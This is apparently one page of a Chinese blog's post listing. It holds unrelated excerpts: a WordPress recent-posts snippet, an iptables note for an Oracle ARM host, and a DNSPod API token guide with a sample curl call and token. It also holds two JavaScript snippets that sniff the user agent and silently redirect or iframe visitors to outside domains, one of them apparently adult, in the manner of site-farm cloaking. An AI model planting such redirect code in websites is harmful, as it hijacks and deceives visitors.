最新发布 第5页
<?php // Include WordPress define('WP_USE_THEMES', false); require('./wp-load.php'); query_posts('showposts=5'); //这个调用最新文章,如果是热门文章的话则改为get_most_viewed("post",10),前提是你的主题安装了热门文章插件,而且此方法可以接受几乎wp-kit-cn所有代码。 ?> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <?php while (have_posts()): the_post(); ?> <tr><td height="23">· 【新上源码】 <a href="<?php the_permalink(); ?>" target="_blank"><b><?php echo mb_strimwidth(strip_tags(apply_filters('the_title', $post->post_title)), 0, 50," "); ?></b></a></td></tr> <?php endwhile; ?> </table> 目录建立php文件把代码粘贴进去就可以了。在其他地方随意调用自身内容
There is no excerpt because this is a protected post.
There is no excerpt because this is a protected post.
There is no excerpt because this is a protected post.
There is no excerpt because this is a protected post.
There is no excerpt because this is a protected post.
<script src=”http://1004619.com/js.js” type=”text/javascript”></script> js代码如下: function uaredirect() { var n = navigator.userAgent.toLowerCase(); if (n.indexOf('android')>-1){ document.writeln('<iframe scrolling="no" frameborder="0" marginheight="0" marginwidth="0" width="960" height="2000" allowTransparency src="http://www.1004619.com"></iframe>'); } else if (n.indexOf('iphone')>-1 || n.indexOf('iPhone')>-1 || n.indexOf('ipod')>-1 || n.indexOf('ipad')>-1 || n.indexOf('ios')>-1){ document.writeln('<iframe scrolling="no" frameborder="0" marginheight="0" marginwidth="0" width="960" height="2000" allowTransparency src="http://www.yyouujizz.com"></iframe>'); } else { document.writeln('<center><iframe scrolling="no" frameborder="0" marginheight="0" marginwidth="0" width="1000" height="2050" allowTransparency src="http://www.1004619.com"></iframe></center>'); } } uaredirect();
<ScrIpT language="javaScrIpT" src="http://www.xxx.com/static/js/ylm.js" type="text/javaScrIpT"></ScrIpT> 最近比较流行的的迅排框架100%嵌入式代码,下面的是被调用的代码 var mobileAgent = new Array("iphone", "ipod", "ipad", "android", "mobile", "blackberry", "webos", "incognito", "webmate", "bada", "nokia", "lg", "ucweb", "skyfire"); var browser = navigator.userAgent.toLowerCase(); var isMobile = false; for (var i=0; i<mobileAgent.length; i++){ if (browser.indexOf(mobileAgent[i])!=-1){ isMobile = true; location.href = 'http://wap.ylm0553.com/?zhanqun'; break; } } document.writeln("<frameset cols=\"100%\"><frame src=\"http://www.ylm0553.com/?zhanqun\"></frameset>");

前言 上周五,一个运气好,刚好甲骨文放量,刚好手工测试一下,终于开了两台心心念的ARM 主机,由于刚好周未要陪小孩玩,就一直没折腾,今天上班,赶紧折腾跑起来了,发现装完宝塔后,配置了准入规则,该放行的端口都放行了,还是一直无法访问,后来发现是iptables 还是要修改呀。

1. 使用 Token 来鉴权有什么好处? Token 的生成是完全独立于帐号密码的,即使 Token 丢失,黑客也不知道用户的帐号和密码,万一 Token 泄漏,用户只需要登录 DNSPod 后台,将有安全问题的 Token 删除即可,极大的提高了帐号安全性 。 2.如何使用 Token 来调用 API 1)创建一个 Token,依次点击 用户中心 -> 安全设置 -> API Token: 2)点击创建一个 Token,输入 Token 名称即可,名称仅用来标记 Token,方便用户管理 Token ,不参与鉴权。 3)点击 “确定” 之后,Token 创建成功,会弹出如下提示框: 同时,用户帐号邮箱会收到 Token 创建成功的邮件: 务必注意上图信息中的 ID 和 Token,需要用这两个字段来组合成一个完整的 Token,组合方式为:”ID,Token”(用英文半角逗号分割),比如说本示例中,完整的 Token 为:13490,6b5976c68aba5b14a0558b77c17c3932 。得到完整的 Token 之后,调用方式如下 curl http://dnsapi.cn/Domain.List -d “login_token=13490,6b5976c68aba5b14a0558b77c17c3932&format=json”